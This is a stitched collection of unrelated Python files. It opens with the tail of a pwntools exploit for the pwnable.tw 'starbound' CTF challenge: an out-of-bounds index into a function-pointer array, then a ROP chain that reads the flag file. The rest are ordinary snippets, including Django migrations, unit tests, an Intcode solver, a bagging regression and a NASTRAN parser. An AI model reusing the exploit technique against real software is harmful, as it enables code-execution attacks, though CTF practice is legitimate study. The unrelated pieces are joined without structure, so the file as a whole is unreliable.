1. In main(), the program reads 256 bytes from the user
onto the stack, and then calls strtol() to parse
the index string to an int.
2. In .bss, there are an array of function pointers `fptrs`.
When the user types `2`, then the function at `fptrs[2]`
will be called.
3. The username's buffer resides in .bss and it is
*before* `fptrs`.
Exploitation
===
1. Since the username's buffer is *before* the array
of menu function pointers, we can give the program some
negative index to achieve arbitray execution.
2. Instead of just typing the index, a malicious user can
send additional bytes following the index. Even though
they'll be ignored by strtol(), the data are still there
on the stack. -> ROP
3. ROP?
a) open(), read(), write(), or
b) return2dl_resolve and call system("/bin/sh")
"""
proc = remote('chall.pwnable.tw', 10202)
#proc = elf.process()
log.debug('You may attatch this process to gdb now.')
raw_input()
set_name(proc, p32(add_esp_0x28_pop_ebx_ret))
payload = str((username - fp_array) // 4).encode().ljust(4, b'A')
payload += A4 * 5
payload += call_func(elf.sym['read'], pop3ret, [0, bin_sh, 256])
payload += call_func(elf.sym['open'], pop2ret, [flag_path, O_RDONLY])
payload += call_func(elf.sym['read'], pop3ret, [3, buf, 64])
payload += call_func(elf.sym['write'], pop3ret, [1, buf, 64])
proc.recvuntil('> ')
proc.send(payload)
time.sleep(0.5)
proc.send(b'/bin/sh\x00/home/starbound/flag\x00')
proc.interactive()
if __name__ == '__main__':
main()
|
# -*- coding: utf-8 -*-
"""Tests for Windows AMCache (AMCache.hve) files."""
import unittest
from dtformats import amcache
from tests import test_lib
class WindowsAMCacheFileTest(test_lib.BaseTestCase):
"""Windows AMCache (AMCache.hve) file tests."""
# pylint: disable=protected-access
# TODO: add test for _ReadFileKey
# TODO: add test for _ReadFileReferenceKey
def testReadFileObject(self):
"""Tests the ReadFileObject function."""
test_file_path = self._GetTestFilePath(['Amcache.hve'])
self._SkipIfPathNotExists(test_file_path)
output_writer = test_lib.TestOutputWriter()
test_file = amcache.WindowsAMCacheFile(
debug=True, output_writer=output_writer)
test_file.Open(test_file_path)
if __name__ == '__main__':
unittest.main()
|
def counting(a,b,X):
A = [ [-1 for j in range(b + 1)] for i in range(a +1 ) ]
for i in range(a + 1):
A[i][0] = 0
for j in range(b + 1):
A[0][j] = 0
for i,j in X:
A[i][j] = 0
A[1][1] = 1
for i in range(1,a+1):
for j in range(1,b+1):
if A[i][j] == -1:
A[i][j] = A[i-1][j] + A[i][j-1]
return A[a][b]
a = 5
b = 6
X = [[2,3],[4,5]]
print(counting(a,b,X)) |
# -*- coding: utf-8 -*-
"""Convert support.support="never" to "no".
"never" was used to signal that the browser maintainer had decided not to
support a feature, and was usually supported by a WON'T FIX ticket. This
changes the API strategy to support="no", and (optionally) linking to
supporting documentation in a note.
See https://bugzilla.mozilla.org/show_bug.cgi?id=1170209
"""
from __future__ import print_function, unicode_literals
from django.conf import settings
from django.db import migrations
from webplatformcompat.cache import Cache
def convert_support_never(apps, schema_editor):
Support = apps.get_model('webplatformcompat', 'Support')
has_never = Support.objects.filter(support='never')
if has_never.exists():
print('\nConverting support.support="never" to "no"...')
Changeset = apps.get_model('webplatformcompat', 'Changeset')
HistoricalSupport = apps.get_model(
'webplatformcompat', 'HistoricalSupport')
User = apps.get_model(settings.AUTH_USER_MODEL)
superuser = User.objects.filter(
is_superuser=True).order_by('id').first()
assert superuser, 'Must be at least one superuser'
cs = Changeset.objects.create(user=superuser)
for support in has_never.iterator():
print('Support %d: Converting support to no' % support.id)
# Update the instance
support.support = 'no'
support._delay_cache = True
support.save()
Cache().delete_all_versions('Support', support.id)
# Create a historical support
hs = HistoricalSupport(
history_date=cs.created, history_changeset=cs,
history_type='~',
**dict((field.attname, getattr(support, field.attname))
for field in Support._meta.fields))
hs.save()
cs.close = True
cs.save()
def warn_about_converted_never(apps, schema_editor):
HistoricalSupport = apps.get_model(
'webplatformcompat', 'HistoricalSupport')
has_never = HistoricalSupport.objects.filter(support='never')
if has_never.exists():
print('\nWARNING: support=never used in past, not restored')
class Migration(migrations.Migration):
dependencies = [
('webplatformcompat', '0010_simple_history_updates'),
]
operations = [
migrations.RunPython(convert_support_never, warn_about_converted_never)
]
|
# Author:ambiguoustexture
# Date: 2020-03-08
import codecs
import snowballstemmer
from collections import Counter
from stop_words import isStopword
file_sentiment = './sentiment.txt'
file_features = './features.txt'
file_encoding = 'cp1252'
stemmer = snowballstemmer.stemmer('english')
word_counter = Counter()
with codecs.open(file_sentiment, 'r', file_encoding) as sentiment:
for sentence in sentiment:
for word in sentence[3:].split(' '):
word = word.strip()
word = stemmer.stemWord(word)
if isStopword(word):
continue
if word != '!' and word != '?' and len(word) <= 1:
continue
word_counter.update([word])
# Use those with 6 or more appearances for features
features = [word for word, count in word_counter.items() if count >= 6]
with codecs.open(file_features, 'w', file_encoding) as content_features:
print(*features, sep='\n', file=content_features)
|
import pandas as pd
import csv
import numpy as np
import matplotlib.pyplot as plt
import pickle
import pprint
from makeGraph import *
INF_val = 999999 # infinite
runOrderNumber = 100
# read in graph from pkl file
pkl_file = open('graph.pkl', 'rb')
graph = pickle.load(pkl_file)
print('Read in graph Done!')
pkl_file.close()
# read in sheet for orders and commodities
pkl_orders = open('sheet_orders.pkl', 'rb')
pkl_commodities = open('sheet_commodities.pkl', 'rb')
sheet_orders = pickle.load(pkl_orders)
sheet_commodities = pickle.load(pkl_commodities)
print('Read in sheets for tables Done!')
pkl_orders.close()
pkl_commodities.close()
hubChoose = []
# construction of order
def getOrder(i):
order = Order()
order.index = i-1
order.start = sheet_orders.cell(row=i, column=1).value
order.end = sheet_orders.cell(row=i, column=2).value
orderTime = sheet_orders.cell(row=i, column=3).value
order.orderTime = orderTime.hour * 3600 + orderTime.minute * 60 + orderTime.second # compare with seconds
order.goods = sheet_orders.cell(row=i, column=4).value
order.amount = sheet_orders.cell(row=i, column=5).value
order.isEmergency = sheet_orders.cell(row=i, column=6).value
order.totalWeight = sheet_commodities.cell(row=order.goods + 1, column=4).value * order.amount
return order
def seconds2time(seconds):
m, s = divmod(seconds, 60)
h, m = divmod(m, 60)
time = "%02d:%02d:%02d" % (h, m, s)
return time
if __name__ == '__main__':
orderIndexNum = 2
while (sheet_orders.cell(row=orderIndexNum, column=1).value):
if orderIndexNum > runOrderNumber:
break
order = getOrder(orderIndexNum)
# initial for dijkstra
select_node_list = []
node_dic = {}
select_node_list.append(order.start)
for index in range(len(graph)):
node_dic[index+1] = [INF_val, -1, -1, 0] # current cost, preorder edge, arrival time, passedTime
node_dic[order.start] = [0, -1, order.orderTime, 0] # set the start node
for edge in graph[order.start-1].edges:
weight = edge.weight(order, order.orderTime)
transTime = edge.distance / edge.speed * 3600 + edge.delayTime * 60
waitTime = (edge.departureTime - order.orderTime if (order.orderTime <= edge.departureTime) else DAY_SEC - order.orderTime + edge.departureTime) # the time to wait for departure
arrivalTime = (order.orderTime + waitTime + transTime) % DAY_SEC
oldNode_dic = node_dic[edge.end]
node_dic[edge.end][0] = weight
node_dic[edge.end][1] = edge
node_dic[edge.end][2] = arrivalTime
node_dic[edge.end][3] = waitTime + transTime
# execution of dijkstra
while (len(select_node_list) < CITY_NUM):
min_key = -1
min_val = INF_val
# find the current nearest node
for key, val in node_dic.items():
if key not in select_node_list and val[0] < min_val:
min_key = key
min_val = val[0]
# insert into selected list
if min_key != -1:
select_node_list.append(min_key)
min_dic = node_dic[min_key]
else:
break
# update the dictionary
for edge in graph[min_key-1].edges:
oldNode_dic = node_dic[edge.end]
weight = edge.weight(order, min_dic[2])
if oldNode_dic[0] > weight + min_dic[0]:
transTime = edge.distance / edge.speed * 3600 + edge.delayTime * 60
waitTime = (edge.departureTime - min_dic[2] if (min_dic[2] <= edge.departureTime) else DAY_SEC - min_dic[2] + edge.departureTime) # the time to wait for departure
arrivalTime = (min_dic[2] + waitTime + transTime) % DAY_SEC
node_dic[edge.end][0] = weight + min_dic[0]
node_dic[edge.end][1] = edge
node_dic[edge.end][2] = arrivalTime
node_dic[edge.end][3] = min_dic[3] + transTime + waitTime
# format the path (not include the start node)
path = []
path.append(order.end)
preorderNode = node_dic[order.end][1].start
while preorderNode != order.start:
path.append(preorderNode)
preorderNode = node_dic[preorderNode][1].start
path.reverse()
# print the path and compute the total time and cost
totalCost = 0
print('The transport solution we choose for order (%d) is as follows: (totalWeight: %f)' % (order.index, order.totalWeight))
for i in range(len(path)):
edge = node_dic[path[i]][1]
edgeCost = order.totalWeight * edge.unitCost * (edge.distance/50)
totalCost += edgeCost
start = edge.start
end = edge.end
way = edge.way
departureTime = seconds2time(edge.departureTime)
arrivalTime = seconds2time(node_dic[path[i]][2])
print('Deliver from city %d to city %d, taking %s, departure at %s, arrive at %s, distance: %f, speed: %f, unitCost: %f, cost: %f' % (start, end, way, departureTime, arrivalTime, edge.distance, edge.speed, edge.unitCost, edgeCost))
startTime = order.orderTime
endTime = node_dic[path[i]][2]
totalTime = node_dic[path[i]][3]
m, s = divmod(totalTime, 60)
h, m = divmod(m, 60)
print('The total cost for delivery is', totalCost)
print('orderTime:', seconds2time(startTime), 'endTime:', seconds2time(endTime), 'totalTime: %d hours, %d minutes, %d seconds' % (h, m, s), 'whick is %d seconds' % totalTime)
print('')
print('')
orderIndexNum += 1
|
'''
In this script, we practice writing exceptions.
Exceptions or exception objects are what are raised when your program encounters an error.
Exceptions contain:
- a description of what went wrong
- and a traceback of where the error occured in the script
Typically, writing exceptions come in the form of this:
try:
# Runs code in this block first
# If no problem occurs, after the try block, python will skip all the except blocks
# and RUN the code in the ELSE block and then RUn the FINALLY block
# <code>
pass
except:
# If an error occurs, jump to this except block
# <code>
pass
except:
# you can have more than one exception and different types of exceptions
# <code>
pass
else:
# The code in the ELSE block runs if the try block code runs successfully
# <code>
pass
finally:
# The code in the FINALLY block runs regardless of what happens above, or no error
# <code>
pass
You can use one of the exceptions from the built-in exceptions or
you can make your own by subclassing from the builtin exception class.
'''
'''
EXAMPLE
Objective:
- write a binary file and return the data
- measure the time required to do this
'''
import timeit
import logging # for logging the results of our run
import os
# First create a logger with basic debug level
logging.basicConfig(filename=os.path.join(os.getcwd(), "problems.log"),
level=logging.DEBUG)
logger = logging.getLogger()
def read_file_timed(path):
''' return the contents of the file at path and measure time required. '''
start_time = timeit.default_timer()
try:
with open(path, "rb") as read_file:
data = read_file.read()
return data
# name the FileNotFoundError object err
except FileNotFoundError as err:
# we log the error
logger.error(err)
# we type the raise command to tell Python
# to we pass along the FileNotFoundError to the user
raise
else:
# This code only executes if there are no exceptions from the try block
pass
finally:
stop_time = timeit.default_timer()
dt = stop_time - start_time
logger.info("Time required for {} = {}".format(os.path.filename(path), dt))
path = '/home/dennis/Desktop/Link to datascience_job_portfolio/notesfromcharliesession.md'
data = read_file_timed(path) |
from .csp import SignupCSP
from .sma import SignupSMA
class Resolver(object):
"""Resolver object for processing waitlist or importing signups"""
__solvers = {
'CSP': SignupCSP,
'SMA': SignupSMA
}
solver = None
def __init__(self, solver):
"""set solver based on string"""
self.solver = self.__solvers[solver]()
|
#!/usr/bin/python
# -*- coding: UTF-8 -*-
"""
题目:利用递归方法求5!。
"""
print
def fib(n):
if n == 0 or n == 1:
return 1
return n*fib(n-1)
print fib(5)
|
def cytoscape_data(G, name: str = "name", ident: str = "id"): ...
def cytoscape_graph(data, name: str = "name", ident: str = "id"): ...
|
from django.urls import path
from . import views
urlpatterns = [
path('', views.home, name='home'),
path('gallery/', views.gallery, name='gallery'),
path('photo/<str:pk>/', views.viewImage, name='photo'),
]
|
try:
from tkinter import *
except:
from Tkinter import *
import sys
sys.path.append('../src/org')
from gameplay import Pacman as pm
from gameplay import Wall as w
from maps import Map1
from display import DrawingGenerics
import unittest
class KeyPress(object):
def __init__(self, keysym):
self.keysym = keysym
def getKeysym(self):
return self.keysym
def setKeysym(self, newKey):
self.keysym = newKey
class test_Pacman(unittest.TestCase):
def setUp(self):
root = Tk()
gameCanvas = Canvas(root, width = 200, height = 200)
gameCanvas.grid(row = 0, column = 0)
self.pacmanSpecs = Map1.getPacmanSpecifications()
self.wallSpecs = Map1.getWallSpecifications()
self.pacman = pm.Pacman(self, gameCanvas, self.pacmanSpecs)
self.walls = []
for i in self.wallSpecs:
self.walls.append(w.Wall(gameCanvas,i))
def getWalls(self):
return self.walls
def test_initGame(self):
#Check that default values set by initGame have been set
self.pacman.initGame()
self.assertEqual(self.pacman.started_, False)
self.assertEqual(self.pacman.left, True)
self.assertEqual(self.pacman.right, False)
self.assertEqual(self.pacman.up, False)
self.assertEqual(self.pacman.down, False)
self.assertEqual(self.pacman.currDir, 'left')
self.assertEqual(self.pacman.inGame, True)
def test_setHaltIterations(self):
#Check that setHaltIterations has, in fact, set self.pacman.halt
self.pacman.setHaltIterations(10)
self.assertEqual(self.pacman.halt, 10)
self.pacman.setHaltIterations(20)
self.assertEqual(self.pacman.halt, 20)
def test_movement(self):
key = KeyPress("Left")
self.pacman.movement(key)
self.assertTrue(self.pacman.started_)
self.assertEqual(self.pacman.desiredDir,"left")
key.setKeysym("Right")
self.pacman.movement(key)
self.assertTrue(self.pacman.started_)
self.assertEqual(self.pacman.desiredDir,"right")
key.setKeysym("Up")
self.pacman.movement(key)
self.assertTrue(self.pacman.started_)
self.assertEqual(self.pacman.desiredDir,"up")
key.setKeysym("Down")
self.pacman.movement(key)
self.assertTrue(self.pacman.started_)
self.assertEqual(self.pacman.desiredDir,"down")
def test_energized(self):
#Check that values that are supposed to change after calling energized() have changed
self.pacman.energized(10)
self.assertEqual(self.pacman.halt, 3)
self.assertEqual(self.pacman.energizeCycles, 10)
self.assertEqual(self.pacman.state, DrawingGenerics.PACMAN_STATE['Energized'])
def test_checkReversalOfDirection(self):
#Expected reversal of direction
self.pacman.desiredDir = 'right'
self.pacman.left = True
self.pacman.right = False
self.pacman.up = False
self.pacman.down = False
self.pacman.checkReversalOfDirection()
self.assertTrue(self.pacman.right)
self.assertFalse(self.pacman.left)
self.assertFalse(self.pacman.up)
self.assertFalse(self.pacman.down)
#No expected change
self.pacman.desiredDir = 'left'
self.pacman.left = True
self.pacman.right = False
self.pacman.up = False
self.pacman.down = False
self.pacman.checkReversalOfDirection()
self.assertTrue(self.pacman.left)
self.assertFalse(self.pacman.right)
self.assertFalse(self.pacman.up)
self.assertFalse(self.pacman.down)
#Expected reversal of directiono
self.pacman.desiredDir = 'up'
self.pacman.left = False
self.pacman.right = False
self.pacman.up = False
self.pacman.down = True
self.pacman.checkReversalOfDirection()
self.assertTrue(self.pacman.up)
self.assertFalse(self.pacman.right)
self.assertFalse(self.pacman.left)
self.assertFalse(self.pacman.down)
#No expected change
self.pacman.desiredDir = 'down'
self.pacman.left = False
self.pacman.right = True
self.pacman.up = False
self.pacman.down = False
self.pacman.checkReversalOfDirection()
self.assertTrue(self.pacman.right)
self.assertFalse(self.pacman.left)
self.assertFalse(self.pacman.up)
self.assertFalse(self.pacman.down)
def test_directionChanged(self):
#Pacman is in starting position, expected to be able to turn left or right, but not up or down
self.pacman.left = False
self.pacman.right = False
self.pacman.up = False
self.pacman.down = False
#No input/no desired direction
self.pacman.desiredDir = ""
self.assertFalse(self.pacman.directionChanged())
self.assertFalse(self.pacman.left)
self.assertFalse(self.pacman.right)
self.assertFalse(self.pacman.up)
self.assertFalse(self.pacman.down)
#Try to move left
self.pacman.desiredDir = "left"
self.assertTrue(self.pacman.directionChanged())
self.assertTrue(self.pacman.left)
self.assertFalse(self.pacman.right)
self.assertFalse(self.pacman.up)
self.assertFalse(self.pacman.down)
#Now moving left, so if we check directionChanged again, it should be false
self.assertFalse(self.pacman.directionChanged())
#Try to move up
self.pacman.desiredDir = "up"
self.assertFalse(self.pacman.directionChanged())
#Direction cannot be changed, so remains left
self.assertTrue(self.pacman.left)
self.assertFalse(self.pacman.right)
self.assertFalse(self.pacman.up)
self.assertFalse(self.pacman.down)
#Try to move right
self.pacman.desiredDir = "right"
self.assertTrue(self.pacman.directionChanged())
#Direction can be changed, so becomes right
self.assertFalse(self.pacman.left)
self.assertTrue(self.pacman.right)
self.assertFalse(self.pacman.up)
self.assertFalse(self.pacman.down)
#Now moving right, so if we check directionChanged again, it should be false
self.assertFalse(self.pacman.directionChanged())
#Try to move down
self.pacman.desiredDir = "down"
self.assertFalse(self.pacman.directionChanged())
#Direction cannot be changed, so remains right
self.assertFalse(self.pacman.left)
self.assertTrue(self.pacman.right)
self.assertFalse(self.pacman.up)
self.assertFalse(self.pacman.down)
def test_currCoordinates(self):
#Check that real current coordinates are being returned
xL = self.pacman.xLeft = 4
xR = self.pacman.xRight = 20
yT = self.pacman.yTop = 10
yB = self.pacman.yBottom = 26
xCenter = (xL + xR) / 2
yCenter = (yT + yB) / 2
self.assertTrue(self.pacman.currCoordinates(), (xCenter, yCenter))
def test_currDirection(self):
#Check that currDirection returns correct value
direction = 'right'
self.pacman.currDir = 'right'
self.assertEqual(self.pacman.currDirection(), direction)
direction = 'left'
self.pacman.currDir = 'left'
self.assertEqual(self.pacman.currDirection(), direction)
direction = 'up'
self.pacman.currDir = 'up'
self.assertEqual(self.pacman.currDirection(), direction)
direction = 'down'
self.pacman.currDir = 'down'
self.assertEqual(self.pacman.currDirection(), direction)
def test_process(self):
#Check for when Pacman is energized
self.pacman.energizeCycles = 2
self.pacman.halt = 0
self.pacman.process()
self.assertEqual(self.pacman.energizeCycles,1)
self.assertEqual(self.pacman.state,DrawingGenerics.PACMAN_STATE['Energized'])
self.assertEqual(self.pacman.speed,1.14 * DrawingGenerics.PIXEL)
#Check for when Pacman is neither energized nor halted
self.pacman.energizeCycles = 0
self.pacman.halt = 0
self.pacman.process()
self.assertEqual(self.pacman.energizeCycles,0)
self.assertEqual(self.pacman.state,DrawingGenerics.PACMAN_STATE['Normal'])
self.assertEqual(self.pacman.speed,1.0 * DrawingGenerics.PIXEL)
#Check for when Pacman is halted
self.pacman.energizeCycles = 0
self.pacman.halt = 4
self.pacman.process()
self.assertEqual(self.pacman.halt,3)
self.assertEqual(self.pacman.state,DrawingGenerics.PACMAN_STATE['Normal'])
#Halt doesn't change the speed, it just skips one iteration of process, stopping him temporarily
self.assertEqual(self.pacman.speed,1.0 * DrawingGenerics.PIXEL)
#Check for when Pacman is halted while energized
self.pacman.energizeCycles = 4
self.pacman.halt = 4
self.pacman.process()
self.assertEqual(self.pacman.energizeCycles,3)
self.assertEqual(self.pacman.halt,3)
self.assertEqual(self.pacman.state,DrawingGenerics.PACMAN_STATE['Energized'])
#Halt doesn't change the speed, it just skips one iteration of process, stopping him temporarily
self.assertEqual(self.pacman.speed,1.14 * DrawingGenerics.PIXEL)
def test_restart(self):
#This function relies on initGame, which has been tested already
#Check that other values set have been set to what is expected
self.pacman.restart()
self.assertEqual(self.pacman.energizeCycles, 0)
self.assertEqual(self.pacman.halt, 0)
self.assertEqual(self.pacman.currCoordinates(), (self.pacman.specs['xCenter'], self.pacman.specs['yCenter']))
self.assertEqual(self.pacman.desiredDir,"")
|
#!/usr/bin/env python
# coding: utf-8
# Copyright (c) Qotto, 2019
""" Regular packages
Import BaseCommand
"""
from .command import BaseCommand
__all__ = [
'BaseCommand',
]
|
#!/usr/bin/env python3
import sys,math,numpy
from itertools import permutations
def testsquare(s,bestx,besty,wid,hei):
angles=[]
sc=s.copy()
out= doMachine(sc,bestx,besty)
angles.append(out[0]==1)
sc=s.copy()
out= doMachine(sc,bestx+wid-1,besty)
angles.append(out[0]==1)
sc=s.copy()
out= doMachine(sc,bestx,besty+hei-1)
angles.append(out[0]==1)
sc=s.copy()
out= doMachine(sc,bestx+wid-1,besty+hei-1)
angles.append(out[0]==1)
return angles
def calcVal(s,pos,mode,rbase):
if mode == 0:
return s[s[pos]]
if mode == 1:
return s[pos]
if mode == 2:
return s[rbase+s[pos]]
print("Unknown mode",mode)
sys.exit()
def putVal(s,pos,mode,rbase,val):
if mode == 0:
s[s[pos]]= val
return
if mode == 1:
print("Mode 1 put should not happen")
s[pos]= val
if mode == 2:
#print("Mode 2 put should not happen")
s[rbase+s[pos]]= val
return
print("Unknown mode",mode)
sys.exit()
def doMachine(s,inp1,inp2):
output= []
pos=0
rbase=0
inp=inp1
while(True):
instr=s[pos]%100
mode1= (int(s[pos]/100))%10
mode2= (int(s[pos]/1000))%10
mode3= (int(s[pos]/10000))%10
#print(pos,s[pos],instr,mode1,mode2,mode3)
if (instr == 99):
return output
elif (instr == 1): #add
x=calcVal(s,pos+1,mode1,rbase)
y=calcVal(s,pos+2,mode2,rbase)
putVal(s,pos+3,mode3,rbase,x+y)
pos+=4
elif (instr == 2): #mult
x=calcVal(s,pos+1,mode1,rbase)
y=calcVal(s,pos+2,mode2,rbase)
putVal(s,pos+3,mode3,rbase,x*y)
pos+=4
#print("Mult",res)
elif (instr == 3): #input
#printScreen(output)
#print("INPUT")
putVal(s,pos+1,mode1,rbase,inp)
inp=inp2
pos+=2
elif (instr == 4): #output
#0=unknown
#1=empty
#2=wall
#3=O2
out=calcVal(s,pos+1,mode1,rbase)
output.append(out)
pos+= 2
elif (instr == 5):
x=calcVal(s,pos+1,mode1,rbase)
y=calcVal(s,pos+2,mode2,rbase)
if (x != 0):
pos= y
else:
pos+=3
elif (instr == 6):
x=calcVal(s,pos+1,mode1,rbase)
y=calcVal(s,pos+2,mode2,rbase)
if (x == 0):
pos= y
else:
pos+=3
elif (instr == 7):
x=calcVal(s,pos+1,mode1,rbase)
y=calcVal(s,pos+2,mode2,rbase)
if (x < y):
putVal(s,pos+3,mode3,rbase,1)
else:
putVal(s,pos+3,mode3,rbase,0)
pos+=4
elif (instr == 8):
x=calcVal(s,pos+1,mode1,rbase)
y=calcVal(s,pos+2,mode2,rbase)
if (x == y):
putVal(s,pos+3,mode3,rbase,1)
else:
putVal(s,pos+3,mode3,rbase,0)
pos+=4
elif (instr == 9):
rbase+=calcVal(s,pos+1,mode1,rbase)
#print("rbase=",rbase)
pos+=2
else:
print("Did not expect ",s[pos])
sys.exit()
return(output,xpos,ypos)
#print(s)
#print("Part 1",s[0])
if len(sys.argv) != 2:
print("Enter input file name as CLI")
sys.exit()
fp= open(sys.argv[1],"r")
l= fp.readline()
fp.close()
s=[]
for string in l.split(","):
s.append(int(string))
#print(s)
#OK, fix size assumptions not ideal but quick
for i in range(10000):
s.append(0)
count= 0
valid_start=[]
beam=numpy.zeros((50,50))
for x in range(50):
for y in range(50):
sc=s.copy()
out=doMachine(sc,x,y)
#print(x,y,out)
if out[0] == 1:
beam[x][y] = 1
count+=1
if (x == 49 or y == 49):
valid_start.append((x,y))
print("Part1 ",count)
(validx,validy)=valid_start[int(len(valid_start)/2)]
wiggle_dist= 10
hei=100
wid=100
while True:
testx=validx+wiggle_dist
testy=validy+wiggle_dist
(nw1,ne1,sw1,se1)=testsquare(s,testx,testy,wid,hei)
#print(validx,validy,wiggle_dist,nw1,ne1,sw1,se1)
if nw1 == True and ne1 == True and sw1 == True:
#print("All true at",testx,testy)
if wiggle_dist == 1:
break
wiggle_dist-=1
continue
testx=validx
testy=validy+wiggle_dist
(nw2,ne2,sw2,se2)=testsquare(s,testx,testy,wid,hei)
if nw2 == True and ne2 == True and sw2 == True:
if wiggle_dist == 1:
break
wiggle_dist-=1
continue
testx=validx+wiggle_dist
testy=validy
(nw3,ne3,sw3,se3)=testsquare(s,testx,testy,wid,hei)
if nw3 == True and ne3 == True and sw3 == True:
if wiggle_dist == 1:
break
wiggle_dist-=1
continue
if nw1 == True:
if ne1 == False and sw1 == False:
validx= validx+wiggle_dist
validy= validy+wiggle_dist
continue
if ne1 == False and nw1 == True:
validx= validx
validy= validy+wiggle_dist
continue
if ne1 == True and sw1 == False:
validx= validx+wiggle_dist
validy= validy
continue
if nw2 == True:
validx= validx
validy= validy+wiggle_dist
print("2",(nw2,ne2,sw2,se2))
continue
if nw3 == True:
validx= validx+wiggle_dist
validy= validy
continue
if wiggle_dist == 1:
print ("Wiggle stopping -- this is probably a problem")
wiggle_dist-=1
#print(validx,validy)
moved= True
while moved:
moved= False
for dirn in [(-2,-2),(-2,-1),(-1,-2),(-1,-1),(-2,0),(0,-2),(-1,0),(0,-1)]:
testx= validx+dirn[0]
testy= validy+dirn[1]
(nw1,ne1,sw1,se1)=testsquare(s,testx,testy,wid,hei)
if nw1 == True and ne1 == True and sw1 == True:
validx= testx
validy= testy
moved= True
break
print("Part 2:",validx*10000+validy)
|
# Generated by Django 3.2.5 on 2021-07-24 22:50
import django.core.validators
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('dashboard', '0002_rename_student_id_dashboard_student'),
]
operations = [
migrations.AlterField(
model_name='dashboard',
name='grade',
field=models.PositiveSmallIntegerField(default=1, validators=[django.core.validators.MinValueValidator(1), django.core.validators.MaxValueValidator(10)]),
),
migrations.AlterField(
model_name='dashboard',
name='group',
field=models.CharField(choices=[('A', 'Group A'), ('B', 'Group B'), ('C', 'Group C')], default='A', max_length=1),
),
migrations.AlterField(
model_name='dashboard',
name='year',
field=models.CharField(choices=[('1', 'First year'), ('2', 'Second year'), ('3', 'Third year')], default='1', max_length=1),
),
]
|
# -*- coding: utf-8 -*-
__author__ = 'Jeonghun Yoon'
'''
I will implement 'Bagging'. I will use the 'Regression tree' as a base learner.
Output will be a average of results of base learners.
'''
import urllib
import random
from sklearn.cross_validation import train_test_split
from sklearn.tree import DecisionTreeRegressor
from math import floor
import matplotlib.pyplot as plot
### 1. Load data from UCI repository and
xData = []
yData = []
f = urllib.urlopen("http://archive.ics.uci.edu/ml/machine-learning-databases/wine-quality/winequality-red.csv")
# Split titles and datas
lines = f.readlines()
titles = lines[:1]
lines = lines[1:]
for line in lines:
tokens = line.strip().split(';')
# Extract target value
yData.append(float(tokens[-1]))
del(tokens[-1])
# Extract data
xData.append(map(float, tokens))
nData = len(xData)
nFeat = len(xData[0])
### 2. Divide data set into train set and test set! Why? avoid overfitting
xTrain, xTest, yTrain, yTest = train_test_split(xData, yData, test_size=0.3, random_state=531)
nTrain = len(xTrain)
# Set parameters for ensemble model
nBaseModel = 100
treeDepth = 10
modelList = []
predList = []
# Extract samples for bagging
bagProp = 1
nBagSamples = int(len(xTrain) * bagProp)
### 3. Fit models
# Bootstrap Sampling (with replacement)
for iBaseModel in range(nBaseModel):
sampIdx = []
for i in range(nBagSamples):
sampIdx.append(random.choice(range(nTrain)))
sampIdx = sorted(sampIdx)
xTrainBag = [xTrain[i] for i in sampIdx]
yTrainBag = [yTrain[i] for i in sampIdx]
baseModel = DecisionTreeRegressor(max_depth=treeDepth)
# Fit a model (Previous models are independant to current fitting.)
baseModel.fit(xTrainBag, yTrainBag)
# Predict on test set
pred = baseModel.predict(xTest)
predList.append(pred)
modelList.append(baseModel)
### 4. Assessment for these model.
mse = []
allPredictions = []
nModel = len(modelList)
for iModel in range(nModel):
prediction = []
# Prediction : average of models output
for iPred in range(len(xTest)):
pred = sum([predList[i][iPred] for i in range(iModel + 1)]) / (iModel + 1)
prediction.append(pred)
error = [(yTest[i] - prediction[i]) for i in range(len(yTest))]
mse.append(sum([e * e for e in error]) / len(error))
allPredictions.append(prediction)
nModelIdx = [i+1 for i in range(nModel)]
### 5. Plotting
plot.figure()
plot.plot(nModelIdx, mse)
plot.axis("tight")
plot.xlabel("Number of Models in Ensemble")
plot.ylabel("Mean Squared Error")
plot.ylim((0.0, max(mse)))
plot.show()
print ("Minimum MSE")
print(min(mse)) |
import pandas as pd
import numpy as np
MODAL_REAL_EIGV_KEYS = {
'MODE': 'Frequency',
'EXTRACTIONORDER': 'Inverse Frequency',
'EIGENVALUE': 'Velocity',
'RADIANS': 'Damping',
'CYCLES': 'Damping',
'GENERALIZEDMASS': 'Frequency',
'GENERALIZEDSTIFF': 'Real Eigenvalue',
}
def _parse_content(content):
data = []
for line in content:
entries = line.split()
inner_data = []
for entry in entries:
try:
e = float(entry)
except ValueError:
e = np.nan
finally:
inner_data.append(e)
data.append(inner_data)
return data
def read_modal_f06(filename: str):
with open(filename, 'r') as file:
raw_lines = file.readlines()
for i, line in enumerate(raw_lines):
if 'R E A L E I G E N V A L U E S' in line:
raw_content = []
j = i+3 # linha após as labels de dados
while raw_lines[j][0] != '1': # primeiro char na linha final da pagina é 1
l = raw_lines[j]
if l.strip() == '':
break
raw_content.append(l)
j += 1
parsed_data = _parse_content(raw_content)
df = pd.DataFrame(parsed_data, columns=list(MODAL_REAL_EIGV_KEYS.keys()))
return df
|
import unittest
import sys
if sys.hexversion < 0x2070000:
# Monkey-patch unittest.TestCase to add assertIsInstance on Python 2.6
def assertIsInstance(self, obj, cls, msg=None):
"""Same as self.assertTrue(isinstance(obj, cls)), with a nicer default message."""
if not isinstance(obj, cls):
self.fail('%r is not an instance of %r but is a %r' % (obj, cls, type(obj)))
unittest.TestCase.assertIsInstance = assertIsInstance
|
"""
News
"""
import requests
import canopy
app, kv, sql, view = canopy.branch(__name__, __doc__, subreddit=r"\w+")
reddit_api = "https://reddit.com/"
@app.route(r"")
class News:
def GET(self):
return view.index(self.delegate(HackerNews), self.delegate(Reddit))
@app.route(r"HackerNews")
class HackerNews:
def GET(self):
top_post_ids = requests.get(hn_api + "topstories.json").json()[:25]
top = [requests.get(hn_api + "item/{}.json".format(post_id)).json()
for post_id in top_post_ids]
return view.hackernews.index(top)
@app.route(r"Reddit")
class Reddit:
def GET(self):
reddit = requests.get(reddit_api + ".json").json()
subreddits = [self.delegate(SubReddit, subreddit=s)
for s in ("python",)]
return view.reddit.index(reddit, subreddits)
@app.route(r"Reddit/{subreddit}")
class SubReddit:
def GET(self):
subreddit_uri = reddit_api + "r/{}.json".format(self.subreddit)
subreddit = requests.get(subreddit_uri).json()
return view.reddit.subreddit(subreddit)
|
#! /usr/bin/env python
from datetime import datetime
f = open('/home/pi/ESW/Pilot_1.x.x/ADC/datavalues.txt', 'r+')
f.write(str(datetime.now()))
f.close()
|
# Goal
#
